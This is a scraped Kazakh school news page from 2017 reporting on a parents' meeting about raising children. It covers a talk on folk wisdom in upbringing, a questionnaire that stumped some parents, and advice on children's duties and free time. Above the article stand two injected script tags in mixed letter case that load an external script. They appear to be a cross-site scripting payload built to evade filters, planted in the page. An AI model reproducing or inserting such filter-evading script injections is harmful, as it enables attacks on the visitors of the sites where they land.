<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

11.11.2017

Баланың басты ұстазы – ата-ана

Қазіргі кездегі мектептің қойып отырған талабы – жеткіншек ұрпақтарды негізгі пәндермен терең де берік қаруландыру, ал меңгерген ілімдерді күнделікті өмірде өз деңгейіндегі іскерлік, шеберлікпен қолдана білу болып табылады. Мұндай күрделі мәселені мектеп тек қана ата-ананың бірігіп жұмыс істеуі нәтижесінде шеше алады.

Осыған орай мектебімізде оқитын көп балалы, кірісі төмен,жетім және қамқорлыққа алынған оқушылардың ата-аналармен үнемі жұмыстар жүргізіп отырамыз.

Қазанның 24-інде өткізілген ата-аналар жиналысында, ата-аналарға «Бала тәрбиесіндегі – халық даналығы» тақырыбында баяндама оқылды. Әртүрлі сұрақ-жауаптар, ата-ананың көкейінде жүрген сұрарақтарына жауап берілді.

Жиналыста ата-аналарға «сауалнама» таратылды. Кейбір ата-аналар сауалнамаға дұрыс жауап бере алмай, дағдарылып та қалды. Мәселен, балаңыздың жақсы көрген түсі, балаңыздың шын досы кім, балаңыздың болашақта кім болғысы келеді? – деген сұрақтарға жауап бере алмай тосылғандары да болды. Бұл туралы баламмен ашық сөйлеспеппін деп ашығын айтқандар да болды. Ата-аналарға баланың сабақтан тыс уақытын қалай ұйымдастыру керектігі, баланың еңбек дағдысын қалыптастыру үшін оның алдына қойған мақсаты, тапсырылған істің шарты белгіленуі керектігі айтылып өтілді. Берілген тапсырманы мезгілінде орындау, орындалуын тексеріп, жауапкершілігін арттырып отыру керектігі ұсынылды. Сонда ғана бала тапсырманы дұрыс орындауға, жауапкершілікке, тиянақтылыққа үйренеді.

Бала – Отанымыздың келешегі, біздің жалғасымыз. Сондықтан бала тәрбиесі – баршамызға ортақ іс. Әр ата-ана өз баласын еліне, халқына шын берілген, халқын құрметтей алатын, дені сау, білімді, еңбексүйгіш, жан-жақты жетілген азамат етіп тәрбиелеуі тиіс және борышымыз деп білейік.

Просмотров: 813


Пікір қосу



Деректерді қолтаңбаға қосу